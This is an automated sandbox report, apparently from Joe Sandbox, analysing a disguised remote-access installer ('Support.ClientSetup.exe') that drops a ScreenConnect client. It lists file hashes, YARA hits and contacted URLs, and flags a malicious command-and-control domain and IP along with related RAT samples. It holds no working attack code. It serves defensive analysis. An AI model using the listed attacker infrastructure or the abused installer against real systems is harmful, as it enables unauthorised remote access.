C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dll | 0% | ReversingLabs | |
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs | |
C:\Windows\Installer\MSI8195.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI837B.tmp | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://t0.ssl.ak.dynamic.tiles.virtualea | 0% | Avira URL Cloud | safe |
https://t0.ssl.ak.dynamic.tilx | 0% | Avira URL Cloud | safe |
https://t0.ssl.ak.dynamic | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fmt2as.ddns.net | 194.59.31.27 | true | true | | unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000D.00000003.1366443338.0000016E2D887000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000D.00000003.1366660793.0000016E2D86D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                      high
                                                      https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                                        high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 0000000D.00000003.1366905237.0000016E2D85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.ver)svchost.exe, 0000000C.00000002.2323244715.0000027972E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 0000000C.00000003.1202799313.0000027972D00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drfalse
                                                                    high
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                                        high
                                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://g.live.com/odclientsettings/Prod/C:edb.log.12.drfalse
                                                                                      high
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                                                                          high
                                                                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://dynamic.tsvchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://t0.ssl.ak.dynamic.tilxsvchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                                                                                  high
                                                                                                  https://t0.ssl.ak.dynamicsvchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
URL: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2321754892.000000000240B000.00000004.00000800.00020000.00000000.sdmp; ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://www.bingmapsportal.com
Source: svchost.exe, 0000000D.00000002.1368208506.0000016E2D824000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000003.1366957520.0000016E2D822000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://t0.ssl.ak.dynamic.tiles.virtualea
Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

URL: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000003.1367377143.0000016E2D84E000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high
Contacted IPs (public):
IP: 194.59.31.27
Domain: fmt2as.ddns.net
Country: Germany
ASN: 30823
ASN Name: COMBAHTONcombahtonGmbHDE
Malicious: true

Contacted IPs (private):
IP: 127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568673
Start date and time: 2024-12-04 20:04:58 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Support.ClientSetup.exe
Detection: MAL
Classification: mal50.troj.evad.winEXE@26/58@1/2
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 208
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, evoke-windowsservices-tas.msedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rundll32.exe, PID 6168 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: Support.ClientSetup.exe
Time     | Type            | Description
14:05:44 | API Interceptor | 2x Sleep call for process: svchost.exe modified
14:06:51 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
Match                    | Associated Sample Name / URL                                                                       | Detection | Threat Name         | Context
COMBAHTONcombahtonGmbHDE | Counseling_Services_Overview.docm                                                                  | malicious | Unknown             | 45.147.231.195
COMBAHTONcombahtonGmbHDE | Nowe zamówienie - 0072291855.pdf (243KB).com.exe                                                   | malicious | Quasar              | 194.59.31.75
COMBAHTONcombahtonGmbHDE | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html       | malicious | ScreenConnect Tool  | 194.59.31.199
COMBAHTONcombahtonGmbHDE | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html       | malicious | ScreenConnect Tool  | 194.59.31.199
COMBAHTONcombahtonGmbHDE | firestub.bat                                                                                       | malicious | Unknown             | 194.59.30.10
COMBAHTONcombahtonGmbHDE | Cotización 99026475526_pdf.com.exe                                                                 | malicious | Quasar              | 194.59.31.75
COMBAHTONcombahtonGmbHDE | file.exe                                                                                           | malicious | ScreenConnect Tool  | 194.59.30.222
COMBAHTONcombahtonGmbHDE | DEMASI-24-12B DOC. SCAN.exe                                                                        | malicious | GuLoader, Remcos    | 194.59.31.40
COMBAHTONcombahtonGmbHDE | Orden de Noviembre.com.exe                                                                         | malicious | AsyncRAT            | 194.59.31.47
COMBAHTONcombahtonGmbHDE | monthly-eStatementForum120478962.Client.exe                                                        | malicious | ScreenConnect Tool  | 194.59.30.201
Match                                                                                        | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dll      | f53WqfzzNt.exe               | malicious | ScreenConnect Tool
                                                                                             | tiG6Ep202n.exe               | malicious | ScreenConnect Tool
                                                                                             | 6IqUjK9Koj.exe               | malicious | ScreenConnect Tool
                                                                                             | f53WqfzzNt.exe               | malicious | ScreenConnect Tool
                                                                                             | tiG6Ep202n.exe               | malicious | ScreenConnect Tool
                                                                                             | 6IqUjK9Koj.exe               | malicious | ScreenConnect Tool
                                                                                             | hB52OUUCE2.exe               | malicious | ScreenConnect Tool
                                                                                             | lCwus2wfk6.exe               | malicious | ScreenConnect Tool
                                                                                             | pbenHWj8JO.exe               | malicious | ScreenConnect Tool
                                                                                             | VVs9SAqm5N.exe               | malicious | ScreenConnect Tool
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: modified
Size (bytes): 219736
Entropy (8bit): 6.5817353625566986
Encrypted: false
SSDEEP: 3072:hg9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGt:hguH2aCGw1ST1wQLdqvt
MD5: 8D75DD9A63D90C5C6902BD3C7B862EB1
SHA1: FA013107D6D49A0C0E43D6151AF0CA2C517EAA8C
SHA-256: B801A45EC0A78997648E49255B235D6A3FF2676D68284129E93CC81A54B38DEA
SHA-512: 8B40022160003749FB39DD25088D56F853AB431F41346D16230F9AD2C6E0AE0FCA8F0994C8F82713212B5667BC80F3AA8773977605801DB909D6919F7802664B
Malicious: false
Yara Hits:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\3b7ed6.rbs, Author: Joe Security
Preview: ...@IXOS.@.....@.p.Y.@.....@.....@.....@.....@.....@......&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}'.ScreenConnect Client (a9232c38f7080cfd)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a9232c38f7080cfd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{0ED93A37-D914-4786-4DE4-5166DDDFF5DB}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{AD71803F-3650-93C2-8A8A-F94B61FB08A9}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{DEF0A81D-558D-FB7C-4CE8-CE27F564707C}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{46F1D0F8-DF22-16D8-6585-517801B66243}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{FB083756-261E-B3C0-9FCC-3340BEB95187}&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.@......&.{29F4E2EF-B149-6F4D-C2B1-79D5C4EECF14}&.{F9AF0EC3-4E4A-7A37-BF0D
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 374
Entropy (8bit): 4.835279329387413
Encrypted: false
SSDEEP: 6:8kVXdyrKDLIP12MUAvvR+oHscNOLG6cAtdMwcqlCMkMwFpRHkEYaDHwercjGs:rHy2DLI4MWoHX89cAP5TlO5FMD+Hc6s
MD5: 29E046B4E6C3EE0C3E06662C5D3161A1
SHA1: C7BF6CF354E0560C26F759B2E47821491C2DC01E
SHA-256: EB989C88C2A3BF8FA7207B0C651E0C7D6A3424FFA8C3AB0FEA0A9AAE616A3FC8
SHA-512: 0D3B146C8EBA13D1F937B6D124505B9AAB04FA79631CADB416FE8B2C199A4E60768CE18FD69AC243A1D469E39566A630A87D7574DFA4A90B193D311BA0C3DC5F
Malicious: false
Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.4...n_%.......4... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.;....9Windows is updating... Please do not turn off your device..ERROR
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 257
Entropy (8bit): 4.896176001960815
Encrypted: false
SSDEEP: 6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
MD5: C72D7889B5E0BB8AC27B83759F108BD8
SHA1: 2BECC870DB304A8F28FAAB199AE6834B97385551
SHA-256: 3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
SHA-512: 2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
Malicious: false
Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 50133
Entropy (8bit): 4.759054454534641
Encrypted: false
SSDEEP: 1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5: D524E8E6FD04B097F0401B2B668DB303
SHA1: 9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256: 07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512: E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious: false
Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 26722
Entropy (8bit): 7.7401940386372345
Encrypted: false
SSDEEP: 384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5: 5CD580B22DA0C33EC6730B10A6C74932
SHA1: 0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256: DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512: C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious: false
Preview: ...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):197120
                                                                                                                                        Entropy (8bit):6.586775768189165
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: f53WqfzzNt.exe, Detection: malicious
                                                                                                                                        • Filename: tiG6Ep202n.exe, Detection: malicious
                                                                                                                                        • Filename: 6IqUjK9Koj.exe, Detection: malicious
                                                                                                                                        • Filename: hB52OUUCE2.exe, Detection: malicious
                                                                                                                                        • Filename: lCwus2wfk6.exe, Detection: malicious
                                                                                                                                        • Filename: pbenHWj8JO.exe, Detection: malicious
                                                                                                                                        • Filename: VVs9SAqm5N.exe, Detection: malicious
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):68096
                                                                                                                                        Entropy (8bit):6.06942231395039
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
